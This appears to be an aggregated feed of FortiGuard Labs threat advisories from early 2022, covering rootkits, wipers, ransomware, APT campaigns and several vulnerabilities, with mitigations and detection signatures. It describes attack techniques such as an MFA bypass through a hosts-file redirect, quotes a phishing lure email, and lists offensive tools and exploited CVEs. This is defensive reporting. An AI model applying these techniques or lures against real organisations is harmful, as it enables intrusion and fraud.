What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-03-18 13:39:21 | New Rootkit Used by UNC2891 for ATM Money Heist (lien direct) | FortiGuard Labs is aware of a report that a threat actor known as UNC2891 used a previously unknown rootkit to capture banking card and PIN verification data from compromised ATM switch servers. The captured data was used to perform fraudulent transactions. Dubbed Caketap, the rootkit allows the threat actor to hide network connections, processes, and files, and install several hooks into system functions to receive commands and configurations from the attacker's remote server.Why is this Significant?This is significant because the previously unknown Caketap rootkit deployed by the threat actor for Oracle Solaris systems provides stealth for the attacker's activities and the data it steals can be used for unauthorized financial transactions. The attacks carried out by UNC2891 are financially motivated and could cause great financial damage to the targeted financial institutions. What is Caketap?Caketap is a kernel module rootkit used by UNC2891 on Oracle Solaris systems. The rootkit is used to hide network connections, processes, and files, and install several hooks into system functions to receive commands and configurations from the attacker's remote server.The rootkit is capable of intercepting certain messages sent for the Payment Hardware Security Module (HSM) in order to disable proper banking card verification and return a valid response to approve fraudulent banking cards. It also examines PIN verification messages. If PIN verification messages are not for a fraudulent banking card, then Caketap does not disrupt valid verification but saves the messages. If Caketap detects PIN verification messages for fraudulent banking cards, it replays the previously saved valid messages for PIN verification bypass.Thales, an HSM vendor, describes the Payment Hardware Security Module (HSM) as "a hardened, tamper-resistant hardware device that is used primarily by the retail banking industry to provide high levels of protection for cryptographic keys and customer PINs used during the issuance of magnetic stripe and EMV chip cards (and their mobile application equivalents) and the subsequent processing of credit and debit card payment transactions".What is UNC2891?UNC2891 is a threat actor whose main motivation is reportedly for financial gain and has been active for several years. The threat actor is known to not only have extensive knowledge on Oracle Solaris systems, but also Linux and Unix systems.What Other Tools does UNC2891 Use?The following tools are reported to have been used by the threat actor:SLAPSTICK - the Pluggable Authentication Module (PAM) based backdoorCustom version of TINYSHELL - backdoorSTEELHOUND - in-memory dropperSTEELCORGI - in-memory dropperSUN4ME - toolkits that contains tools to spy on network, host enumeration, exploit known vulnerabilities and wipe logsWINGHOOK - keylogger for Linux and Unix systemsWINGCRACK - utility that is used to decode and display the information collected by WINGHOOKBINBASH - ELF utility that executes a shell after the group ID and user ID are set to either "root" or specified valuesWIPERIGHT - ELF utility for Linux and Unix systems and is used to clear specific logsMIGLOGCLEANER - ELF utility for Linux and Unix systems that is used to wipe logs or remove certain strings from logsWhat is the Status of Coverage?FotriGuard Labs provide the following AV coverage:Linux/Agent.T!tr | Threat | ||
|
2022-03-16 15:04:14 | Joint CyberSecurity Advisory Alert on Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and âPrintNightmareâ Vulnerability (AA22-074A) (lien direct) | FortiGuard Labs is aware of a recent report issued by the U.S. Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) that Russian state-sponsored cyber actors have gained network access to a non-governmental organization (NGO) through exploitation of default Multi-Factor Authentication (MFA) protocols and the "PrintNightmare" vulnerability (CVE-2021-34527). The attack resulted in data exfiltration from cloud and email accounts of the target organization.Why is this Significant?This is significant because the advisory describes how a target organization was compromised by Russian state-sponsored cyber actors. The advisory also provides mitigations.How did the Attack Occur?The advisory provides the following attack sequence:"Russian state-sponsored cyber actors gained initial access to the victim organization via compromised credentials and enrolling a new device in the organization's Duo MFA. The actors gained the credentials via brute-force password guessing attack, allowing them access to a victim account with a simple, predictable password. The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation via exploitation of the "PrintNightmare" vulnerability (CVE-2021-34527) to obtain administrator privileges. The actors also modified a domain controller file, c:\windows\system32\drivers\etc\ hosts, redirecting Duo MFA calls to localhost instead of the Duo server. This change prevented the MFA service from contacting its server to validate MFA login-this effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to "Fail open" if the MFA server is unreachable. Note: "fail open" can happen to any MFA implementation and is not exclusive to Duo.After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim's virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts. The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity. Using these compromised accounts without MFA enforced, Russian state-sponsored cyber actors were able to move laterally to the victim's cloud storage and email accounts and access desired content."What is the "PrintNightmare" vulnerability (CVE-2021-34527)?The "PrintNightmare" vulnerability" was a critical vulnerability affecting Microsoft Windows Print Spooler. Microsoft released an out-of-bound advisory for the vulnerability on July 6th, 2021.Has Microsoft Released a Patch for the "PrintNightmare" vulnerability (CVE-2021-34527)?Yes, Microsoft released an out-of-bound patch for the "PrintNightmare" vulnerability in July, 2021.Due to its severity, Microsoft made the patches available for unsupported OS such as Windows 7 and Windows Server 2012.Successful exploitation of the vulnerability allows an attack to run arbitrary code with SYSTEM privileges.FortiGuard Labs released an Outbreak Alert and Threat Signal for PrintNightmare. See the Appendix for a link to "Fortinet Outbreak Alert: Microsoft PrintNightmare" and "#PrintNightmare Zero Day Remote Code Execution Vulnerability".What is the Status of Coverage?FortiGuard Labs has IPS coverage in place for the "PrintNightmare" vulnerability (CVE-2021-34527):MS.Windows.Print.Spooler.AddPrinterDriver.Privilege.EscalationAll known network IOC\ | Vulnerability Threat Patching | ||
|
2022-03-15 13:20:59 | (Déjà vu) Additional Wiper Malware Deployed in Ukraine #CaddyWiper (lien direct) | FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found by security researchers today at ESET. The wiper is dubbed CaddyWiper. Preliminary analysis reveals that the wiper malware erases user data and partition information from attached drives. According to the tweet, CaddyWiper does not share any code with HermeticWiper or IsaacWiper or any known malware families.This is a breaking news event. More information will be added when relevant updates are available.For further reference about Ukrainian wiper attacks please reference our Threat Signal from January and February. Also, please refer to our recent blog that encompasses the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate.Is this the Work of Nobelium/APT29?At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity. Was this Sample Signed?No. Unlike the HermeticWiper sample related to Ukrainian attacks, this sample is unsigned.Why is Malware Signed?Malware is often signed by threat actors as a pretense to evade AV or any other security software. Signed malware allows threat actors to evade and effectively bypass detection, guaranteeing a higher success rate. What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:W32/CaddyWiper.NCX!tr | Malware Threat | APT 29 | |
|
2022-03-10 23:39:03 | APT41 Compromised Six U.S. State Government Networks (lien direct) | FortiGuard Labs is aware of a report that threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold into the victim's network, the threat actor used a number of different attack vectors: exploiting vulnerable Internet facing web applications and directory traversal vulnerabilities, performing SQL injection, and conducting de-serialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.Why is this Significant? This is significant because at least six U.S. state government systems were broken into and data exfiltration was performed by APT41 as recent as February 2022 In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) as well as Log4j (CVE-2021-44228), among others, were exploited in the attacksWhat's the Detail of the Attack?APT41 performed several different ways to break into the targeted networks.In one case, the group exploited a SQL injection vulnerability in a Internet-facing web application. In another case, a then previously unknown vulnerability (CVE-2021-44207) in USAHerds, which is a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. Also, APT41 reportedly started to exploit the infamous Log4j vulnerability (CVE-2021-44228) within hours of Proof-of-Concept (PoC) code becoming available. Patches for both vulnerabilities are available. Once successful in breaking into the victim's network, the threat actor performed reconnaissance and credential harvesting activities. What is APT41?APT41 is a threat actor who has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and WickedPanda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.What are the Tools Used by APT41?APT41 is known to use the following tools:ASPXSpy - web shell backdoorBITSAdmin - PowerShell cmdlets for creating and managing file transfers.BLACKCOFFEE - backdoor that disguise its communications as benign traffic to legitimate websites certutil - command-line utility tool used for manipulating certification authority (CA) data and components.China Chopper - web shell backdoor that allows attacker to have remote access to an enterprise networkCobalt Strike - a commercial penetration testing tool, which allows users to perform a wide range of activitiesDerusbi - DLL backdoorEmpire - PowerShell post-exploitation agent, which provides a wide range of attack activities to usersgh0st RAT - Remote Access Trojan (RAT)MESSAGETAP - data mining malware Mimikatz - open-source credential dumpernjRAT - Remote Access Trojan (RAT)PlugX - Remote Access Trojan (RAT)PowerSploit - open-source, offensive security framework which allows users to perform a wide range of activitiesROCKBOOT - BootkitShadowPad - backdoorWinnti for Linux - Remote Access Trojan (RAT) for LinuxZxShell - Remote Access Trojan (RAT)Badpotato - open-source tool that allows elevate user rights towards System rightsDustPan - shellcode loader. aka StealthVectorDEADEYE - downloaderLOWKEY - backdoorKeyplug - backdoorWhat are Other Vulnerabilities Known to be Exploited by APT41?APT41 exploited the following, but not restricted to, these vulnerabilities in the past:CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)CVE-2019-19781 (Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance)CVE-2019-3396 (Atlassian Confluence Widget Connector Macro Velocity Template Injection)CVE-2017-11882 (Microsoft Office Memory Corruption Vulnerability)CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execut | Malware Tool Vulnerability Threat Guideline | APT 41 APT 15 APT 15 | |
|
2022-03-09 18:47:38 | FBI Releases Updated Indicators of Compromise for RagnarLocker Ransomware (lien direct) | FortiGuard Labs is aware that the U.S. Federal Bureau of Investigation (FBI) released the updated indicators of compromise (IOCs) for RagnarLocker (Ragnar_Locker) Ransomware on March 8th, 2022. The report states "As of January 2022, the FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware, including entities in the critical manufacturing, energy, financial services, government, and information technology sectors."The first sighting of the ransomware goes back to at least February, 2020. RagnarLocker ransomware employs triple extortion tactics: it demands ransom after encrypting files, threatens to publicize stolen data and to stop DDoS (Distributed Denial of Service) attack against the victim.Why is this Significant?This is significant because the FBI is aware that more than 50 organizations across 10 critical infrastructure sectors were affected by RagnarLocker ransomware. The fact the FBI has made additional IOCs available to the public insinuates that RagnarLocker will continue to be active and will likely produce more victims.What is RagnarLocker Ransomware?The first report of RagnarLocker (Ragnar_Locker) ransomware dates back to as early as February 2020.Just like any other ransomware, RagnarLocker encrypts files on the compromised machine and steals valuable data. It also deletes all Volume Shadow Copies, which prevents recovery of the encrypted files. Although there are some exceptions, files encrypted by RagnarLocker ransomware generally have a file extension that starts with .ragnar_ or ragn@r_ followed by random characters.On top of usual ransom demand to decrypt the files it encrypted, the ransomware threatens to publicize the data it stole from the victim if the ransom demand is not met. The RagnarLocker threat actors also adds pressure to the victim to pay the ransom by performing DDoS (Distributed Denial of Service) attack against the victim.One notable thing about this ransomware is that it has code to check the location of the computer before encryption process starts. If the computer belongs Russia, Azerbaijan, Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Tajikistan, Turkmenistan, Uzbekistan and Ukraine, the ransomware terminates itself. What are the Mitigations for RagnarLocker Ransomware?The following are the mitigations recommended by FBI:Back-up critical data offline.Ensure copies of critical data are in the cloud or on an external hard drive or storage device. This information should not be accessible from the compromised network.Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.Use multi-factor authentication with strong passwords, including for remote access services.Keep computers, devices, and applications patched and up-to-date.Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords and settings.Consider adding an email banner to emails received from outside your organization.Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.Audit user accounts with administrative privileges and configure access controls with least privilege in mind.Implement network segmentation.What is the Status of Coverage?FortiGuard Labs provide the following AV coverage against RagnarLocker ransomware:Linux/Filecoder_RagnarLocker.A!trW32/RagnarLocker.43B7!tr.ransomW32/Filecoder_RagnarLocker.A!trW32/RagnarLocker.A!tr.ransomW32/RagnarLocker.C!trW32/RagnarLocker.B!tr.ransomW32/RagnarLocker.4C9D!tr.ransomW32/Filecoder_RagnarLocker.A!tr.ransomW32/RagnarLocker.C!tr.ransomW32/Filecoder_RagnarLocker.C!trW32/Filecoder.94BA!tr.ransomW32/Filecoder.OAH!tr.ransomAll network IOCs are blocked by the WebFiltering client. | Ransomware Threat | ||
|
2022-03-01 09:16:53 | Remote Utilities Software Distributed in Ukraine via Fake Evacuation Plan Email (lien direct) | FortiGuard Labs is aware that a copy of Remote Manipulator System (RMS) was submitted from Ukraine to VirusTotal on February 28th, 2022. The RMS is a legitimate remote administration tool that allows a user to remotely control another computer. The file name is in Ukrainian and is "Evacuation Plan (approved by the SSU on 28.02.2022 by Order No. 009363677833).exe" in translation to English. The SSU likely stands for the Security Service of Ukraine. Why is this Significant?This is significant because given its file name, the country where the file was submitted to VirusTotal and the current situation in Ukraine, the file may have been distributed to Ukrainians.What does the File Do?The file silently installs a copy of legitimate Remote Utilities software to the compromised machine. The software allows a remote user to control the compromised machine.Based on the telemetry FortiGuard Labs collected, there is one IP address in Ukraine that connected to the remote IP that likely belongs to the attacker. How was the File Distributed to the Targets?Most likely via links in email.CERT-UA published a warning today that "the representatives of the Center for Combating Disinformation began to receive requests for information from the mail of the Ukrainian Security Service. Such notifications are fake and are a cyberattack". The email below is reported have been used in the attack.Machine translation:Email subject: Evacuation plan from: SBU (Urgent) -28.02.2022 day off: 534161WARNING! This is an external sheet: do not click on the links or open a tab if you do not trust the editor.Report a suspicious list to ib@gng.com.ua.Security Service of UkraineGood afternoon, you need to have acquainted with the electronic evacuation plan until 01.03.2022, to give data on the number of employees, fill in the document in accordance with Form 198\00-22SBU-98.To ensure confidentiality of the transferred data, the password: 2267903645 is set on the deposit.See the document on:hxxps://mega.nz/file/[reducted]Mirror 2: hxxps://files.dp.ua/en/[reducted]Mirror 3: hxxps://dropmefiles.com/[reducted]While the remote files were not available at the time of the investigation, the email and "Evacuation Plan (approved by the SSU on 28.02.2022 by Order No. 009363677833).exe" are likely connected based on the email content and the file name. Can the File Attributed to a Particular Threat Actor?It's possible that a threat actor distributed the file to target Ukraine. However, while the Remote Utilities software is silently installed on the compromised machine, it displays an icon in Windows's taskbar. Since most threat actors aim to hide their activities, this is potentially an act of novice attacker who tries to take advantage of the current situation in Ukraine.What is the Status of Coverage?FortiGuard Labs provides the following AV coverage against the files involved in this attack:Riskware/RemoteAdmin_RemoteUtilities | Tool Threat | ||
|
2022-03-01 09:15:01 | Kernel Level Rat "Daxin" Discovered (lien direct) | FortiGuard Labs is aware of a newly discovered backdoor dubbed Daxin. Discovered by Symantec, this backdoor allows an attacker to gather and perform various command and control actions and data exfiltration on victim machines. Because of our partnership with the Cyber Threat Alliance, we were provided with IOCs to create Fortinet protections in advance so that it would be ready for today's announcement.What separates this backdoor from many others is that Daxin is a Windows kernel level driver, also referred to as rootkits. Kernel level rootkits operate at ring 0, which allows them to operate at the highest privileges of the operating system with impunity. What makes this threat dangerous and very effective is that it is able to leverage existing services and utilize them to perform whatever is needed without raising any suspicion by network administrators and or endpoint security software. Daxin does not contain any unique capabilities from other backdoors; however, besides its ability to run at kernel level, Daxin can also intercept TCP/IP connections in real time for further evasion. Further communications noted were the use of a custom TCP/IP stack to communicate in multiple nodes on highly secured networks.This backdoor has been attributed to state sponsored threat actors of China where targets are organizations that are of interest to the Chinese government.What Operating Systems Were Targeted?Windows operating systems.What is the Likelihood of Exploitation?Low. This is due to the attacks observed being focused on the specific interests by the threat actors behind Daxin, and not as part of a widespread attack.Is this Limited to Targeted Attacks?Yes, all attacks observed were limited to state sponsored targets. This included governmental organizations of interest, telecommunications, transportation, and manufacturing sectors as well.What is the Status of Coverage?Customers running the latest AV definitions are protected by the following signatures:W32/Agent.FF56!tr.bdrW32/Backdoor.DAXIN!trW32/PossibleThreatW64/Agent.FF56!tr.bdrW64/Backdoor.DAXIN!trW64/Agent.QWHWSZ!trMalicious_Behavior.SBW32/Exforel.B!tr.bdrDx.BG3D!trW64/Agent.WT!trW32/PossibleThreat | Threat | ||
|
2022-02-27 22:30:37 | Previously Unseen Backdoor Bvp47 Potentially Victimized Global Targets (lien direct) | FortiGuard Labs is aware of a report by Pangu Lab that a new Linux backdoor malware that reportedly belongs to the Equation group was used to potentially compromise more than 200 organizations across over 40 countries around the globe. The Equation group is regarded as one of the most highly skilled threat actors, which some speculate have close connections with National Security Agency (NSA). The threat actor is also reported have been tied to the Stuxnet malware that was used in 2010 cyber attack on a nuclear centrifuge facility in Iran.Why is this Significant?Bvp47 is a previously undiscovered backdoor malware that was reportedly used in cyber attacks carried out by the Equation group. According to the report and information available in the documents that presumably leaked from the Equation group, over 200 organizations spread across more than 40 countries may have been infected with the Bvp47 malware.The Bvp47 file called out in the report was first submitted to VirusTotal in late 2013, which indicates that Bvp47 was used and undiscovered for close to a decade.How was the Connection between the Bvp47 malware and the Equation Group Established?Pangu Lab concluded that Bvp47 belongs to the Equation group because one of the folders included in the documents leaked by the Shadow Brokers in 2017 contained a RSA private key required by Bvp47 for its command execution and other operations.What is the Shadow Brokers?The Shadow Brokers is a threat actor who claimed to have stolen highly classified information from the Equation group in 2016. The stolen information includes zero-day exploits, operation manuals and description of tools used by the Equation group. The Shadow Brokers then attempted to sell the information to the highest bidder. After no one purchased the information, The threat actor released the information to the public after the auction attempt failed.One of the most famous exploits included in the leaked documents is EternalBlue. Within a few weeks of the leak, EternalBlue was incorporated in Wannacry ransomware which caused global panic in 2017.What are the Characteristics of Bvp47?Bvp is a Linux backdoor that performs actions upon receiving commands from Command and Control (C2) servers.Because the Bvp47 framework is incorporated with components such as "dewdrops" and "solutionchar_agents" that are included in the Shadow Brokers leaks, the backdoor is for mainstream Linux distributions, FreeBSD, Solaris as well as JunOS,.Bvp47 also runs various environment checks. If the requirements are not met, the malware deletes itself.What is the Status of Coverage?FortiGuard Labs provide the following AV coverage against Bvp47:ELF/Agent.16DC!tr | Ransomware Malware Threat | Wannacry Wannacry | |
|
2022-02-27 20:17:01 | ProxyToken (CVE-2021-33766): Authentication Bypass in Microsoft Exchange Server (lien direct) | UPDATE 9/17 - An IPS signature has been released in definitions (18.160) as "MS.Exchange.Server.SecurityToken.Authentication.Bypass"FortiGuard Labs is aware of a new disclosure dubbed PROXYTOKEN, which is an authentication bypass in Microsoft Exchange server. The vulnerability was reported by security researcher Le Xuan Tuyen of the Zero Day Initiative (ZDI) in March 2021, and patched by Microsoft in the July 2021 release.Assigned CVE-2021-33766, this vulnerability allows an unauthenticated attacker to configure actions on mailboxes belonging to arbitrary users on the mail server. An example of this usage allows the threat actor to forward all emails addressed to an arbitrary user and forward them to an attacker controlled account.What are the Technical Details of this Vulnerability?Microsoft Exchange server creates two reference sites in IIS, one listening on port 80 HTTP and the other port 443 HTTPS. These pages are known as the Exchange Front End, and the Exchange Back End runs on port 81 HTTP and port 444 for HTTPS respectively. The front end is essentially a proxy to the back end. When forms require authentication, pages are served via /owa/auth/logon/aspx. Essentially, the issue lies when an Exchange specific feature called "Delegated Authentication" is deployed, the front end is unable to perform authentication on its own and passes each request directly to the back end and ultimately relies on the back end to determine if the incoming request is properly authenticated.Is there a Patch Available?Yes. Microsoft has released patches for this in the July 2021 release.What is the Status of Coverage?Customers running the latest definitions are protected by the following IPS signature:MS.Exchange.Server.SecurityToken.Authentication.BypassWhat Products are Affected?Microsoft Exchange Server 2019, 2016, 2013 are affected.Any Other Suggested Mitigation?Disconnect vulnerable Exchange servers from the internet until a patch can be applied.Due to the ease of disruption and potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc., it is important to keep all AV and IPS signatures up to date. It is also important to ensure that all known vendor vulnerabilities within an organization are addressed, and updated to protect against attackers establishing a foothold within a network. | Vulnerability Threat | ||
|
2022-02-23 18:34:00 | New Wiper Malware Discovered Targeting Ukrainian Interests (lien direct) | FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found by security researchers today at ESET. Various estimates from both outfits reveal that the malware wiper has been installed on several hundreds of machines within the Ukraine. Cursory analysis reveals that wiper malware contains a valid signed certificate that belongs to an entity called "Hermetica Digital" based in Cyprus. This is a breaking news event. More information will be added when relevant updates are available. For further reference about Ukrainian wiper attacks please reference our Threat Signal from January. Also, please refer to our most recent blog that encompasses the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate. Is this the Work of Nobelium/APT29?At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity. Are there Other Samples Observed Using the Same Certificate?No. Cursory analysis at this time highlights that the Hermetica Digital certificate used by this malware sample is the only one that we are aware of at this time. Was the Certificate Stolen?Unknown at this time. As this is a breaking news event, information is sparse. Why is the Malware Signed?Malware is often signed by threat actors as a pretence to evade AV or any other security software. Signed malware allows for threat actors to evade and effectively bypass detection and guaranteeing a higher success rate. What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:W32/KillDisk.NCV!tr | Malware Threat | APT 29 | |
|
2022-02-16 16:54:16 | Active Exploitation Against Adobe Commerce and Magento Through CVE-2022-24086 (lien direct) | FortiGuard Labs is aware of reports that Magento Open Source and Adobe Commerce are actively being targeted and exploited through CVE-2022-24086. This vulnerability can lead to remote code execution (RCE) on an exploited server which means an attacker will be able to execute arbitrary commands remotely. The vulnerability is rated as Critical by Adobe and has CVSS score of 9.8 out of 10.Why is this Significant?Since Magento and Adobe Commerce are very popular E-commerce platform across the globe, this can potentially impact a high number of online shoppers. Moreover, the attack complexity needed to carry out a successful attack has been deemed relatively low/easy and no extra privileges/permissions are required to execute this attack. A successful attack can result in the total loss of confidentiality, integrity and availability of the information and resources stored in the exploited server.In addition, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2022-24086 to the Known Exploited Vulnerabilities to Catalog, which lists vulnerabilities that "are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise." What is CVE-2022-24086?Adobe classifies CVE-2022-24086 as a vulnerability that stems from "improper input validation." Without properly sanitizing input from a user, the input can be modified so that it executes arbitrary commands on the exploited server.What Versions of Adobe Commerce and Magento are Prone to CVE-2022-24086?The vulnerability exists for Adobe Commerce 2.4.3-p1 and earlier versions, as well as 2.3.7-p2 and earlier versions. For Adobe Commerce 2.3.3 and below, this vulnerability does not exist. The vulnerability exists for both Adobe Commerce and Magento Open Source versions 2.3.3-p1 to 2.3.7-p2 and from 2.4.0 to 2.4.3-p1.Is the Vulnerability Exploited in the Wild?FortiGuard Labs has been made aware of exploits being used in the wild for this vulnerabilityHas the Vendor Released a Fix?Yes. Adobe has released patches for all versions from 2.3.3-p1 to 2.3.7-p2 and from 2.4.0 to 2.4.3-p1.What is the Status of Coverage?Proof-of-Concept (POC) code is not available at the time of this writing and as such, no coverage is available.FortiGuard Labs is actively looking for additional information and will update this Threat Signal when protection becomes available. | Vulnerability Threat Guideline | ||
|
2022-02-07 10:51:16 | ACTINIUM - Targeting Interests in the Ukraine (lien direct) | FortiGuard Labs is aware of various campaigns targeting Ukraine by threat actors known as ACTINIUM/Gamaredon/DEV-0157. ACTINIUM's modus operandi targets various verticals to conduct cyber espionage, including but not limited to governmental, NGO, law enforcement and nonprofit organizations. This latest campaign targeting Ukraine was observed by security analysts at Microsoft. Observed TTPs of ACTINIUM include spearphishing emails using specially crafted Microsoft Word documents that contain malicious macros. Other observed tactics use image files in the emails that are very tiny in scale and report back to the hosting server so that the attacker can check to see if the email was viewed or not. Of course, this depends on whether the recipient chooses to download images or not.Previous analysis on Gamaredon (another name for ACTINIUM) conducted by FortiGuard Labs can be found here. FortiGuard Labs also documented attacks against Ukraine here.What are the Technical Details of the Attack?ACTINIUM uses multiple stage processes that contain payloads that download and execute further additional payloads. Observed staging techniques contain highly obfuscated VBScripts, PowerShells, self-extracting archives, LNK files, etc. To remain persistent, ACTINIUM relies on scheduled tasks. To evade detection and analysis, the usage of randomly generated dictionary words from a predefined word list were used to assign subdomains, scheduled tasks and file names to further confuse analysts. Other observations seen are the usage of DNS records that are frequently changed and contain unique domain names using multiple IP addresses attributed to them.Three malware families were documented in the report, and they are:PowerPunch - Downloader and droppers using PowerShellPterodo - Malware that uses various hashing algorithms and on-demand schemes for decrypting data while freeing allocated heaps space to evade detection and thwart analysis. The malware is evolving, with the usage of various strings to POST content using forged user agents and various commands and scheduled tasks.QuietSieve - These are heavily obfuscated .NET binaries that act primarily as an infostealer.Who/What is Behind this Attack?According to Microsoft, this latest attack is attributed to the Russian FSB. This is per previous reports by the Ukrainian government linking Gamaredon actors to the FSB.Is this a Widespread Attack?No. According to Microsoft, attacks are limited to targeted attacks in the Ukraine.What is the Status of Coverage?Fortinet customers running the latest definitions are protected by the following AV signatures:MSIL/Pterodo.JJ!trMSIL/Pterodo_AGen.B!trMSIL/Pterodo.JK!trMSIL/Pterodo.JF!trMSIL/Pterodo.JI!trPossibleThreatW32/PossibleThreatVBS/SAgent!trW32/APosT.AUC!trW32/Pterodo.AWR!trW32/APosT!trW32/APosT.AWN!trVBA/Amphitryon.1918!trW32/Pterodo.AVL!trW32/Pterodo.AUZ!trW32/Pterodo.ASQ!trW32/GenKryptik.FGHO!trRiskware/PterodoW32/Pterodo.APR!trW32/Pterodo.AQB!trAll network IOC's are blocked by the WebFiltering client.Any Other Suggested Mitigation?As ACTINIUM uses spearphishing techniques as an entry point, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since it has been reported that various phishing and spearphishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Simple user awareness training on how to spot emails with malicious attachments or links could also help prevent initial access into the network.Due to the ease of disruption and potential for damage to daily operations, reputation, | Malware Threat | ||
|
2022-02-03 16:21:02 | Sugar Ransomware in the Wild (lien direct) | FortiGuard Labs is aware that a new ransomware called "Sugar" is in the wild. Reportedly, Sugar ransomware targets consumers rather than enterprises. The first sample of Sugar ransomware appears to have been discovered in the wild in early November. Sugar ransomware encrypts files on the compromised machine and appends ".emcoded01" file extension to them. Victims are asked to pay ransom to recover the encrypted files.What is Sugar Ransomware?Sugar is a ransomware that is written in Delphi and appeared in the wild in November 2021 at the latest. Once run, Sugar ransomware encrypts files on the compromised machine and appends ".encoded01" file extension to them. The malware then displays a ransom note that asks the victim to visit the attacker's TOR page to pay the ransom in order to recover the encrypted files. The attacker offers to decrypt up to five files to prove that the encrypted files can be recovered upon ransom is paid.The ransom note displayed by Sugar ransomware looks similar to that of REvil ransomware. Also, the TOR site used by Sugar ransomware has close resemblance with that of Cl0p ransomware. However, there is no evidence to suggest that the Sugar ransomware group is associated with REvil and Cl0p threat actors.How Widespread is Sugar Ransomware?Based on the telemetry data collected by FortiGuard Labs, Sugar ransomware infections likely occurred in Canada, Thailand, the United States, Israel and Lithuania.What is the Status of Coverage?FortiGuard Labs provides the following AV coverage against Sugar ransomware:W32/Filecoder.OJD!tr.ransomW32/PossibleThreat | Ransomware Malware Threat | ||
|
2022-01-28 10:28:18 | BotenaGo Malware Targets Multiple IoT Devices (lien direct) | FortiGuard Labs is aware of a report that source code of BotenaGo malware was recently made available on GitHub. BotenaGo is a malware written in Golang and is reportedly capable of exploiting more than 30 vulnerabilities in various IoT devices such as routers, modems, and NAS devices, and varies the delivered payload depending on the device it successfully exploited.Why is this Significant?This is significant because the source code of BotenaGo malware is available on a publicly available repository and with the report that BotenaGo is capable of exploiting more than 30 vulnerabilities, an uptick of its activities is expected.What is BotenaGo Malware?BotenaGo is an IoT (Internet fo Things) malware written in Golang and may become a new arsenal used by Mirai attackers.The malware is reportedly capable of exploiting more than 30 vulnerabilities in various IoT devices (a list of those vulnerabilities is contained in the Alien Labs blog linked in the Appendix). After the targeted device is successfully exploited, the malware executes remote shell commands that download a payload that varies depending on the device it successfully compromised. BotenaGo also sets up a backdoor on the compromised machine and awaits remote commands from the attacker on ports 19412 and 31412. It can also set a listener to system IO (terminal) user input and get remote commands through it.What Vulnerabilities are Exploited by BotenaGo?Some of the known vulnerabilities exploited by BotenaGo are below:CVE-2013-3307: Linksys X3000 1.0.03 build 001CVE-2013-5223: D-Link DSL-2760U Gateway (Rev. E1)CVE-2014-2321: ZTE modemsCVE-2015-2051: D-Link routersCVE-2016-11021: D-Link routersCVE-2016-1555: Netgear devicesCVE-2016-6277: Netgear devicesCVE-2017-18362: ConnectWise pluginCVE-2017-18368: Zyxel routers and NAS devicesCVE-2017-6077: Netgear devicesCVE-2017-6334: Netgear devicesCVE-2018-10088: XiongMai uc-httpd 1.0.0CVE-2018-10561: Dasan GPON home routersCVE-2018-10562: Dasan GPON home routersCVE-2019-19824: Realtek SDK based routersCVE-2020-10173: VR-3033 routerCVE-2020-10987: Tenda productsCVE-2020-8515: Vigor routersCVE-2020-8958: Guangzhou 1 GE ONUCVE-2020-9054: Zyxel routers and NAS devicesCVE-2020-9377: D-Link routers What is the Status of Coverage?FortiGuard Labs provide the following AV coverage against available BotenaGo malware samples:Linux/Botenago.A!trPossibleThreatFortiGuard Labs provides the following IPS coverage against exploit attempts made by BotenaGo:ZTE.Router.Web_shell_cmd.Remote.Command.Execution (CVE-2014-2321)D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution (CVE-2015-2051)Netgear.macAddress.Remote.Command.Execution (CVE-2016-1555)NETGEAR.WebServer.Module.Command.Injection 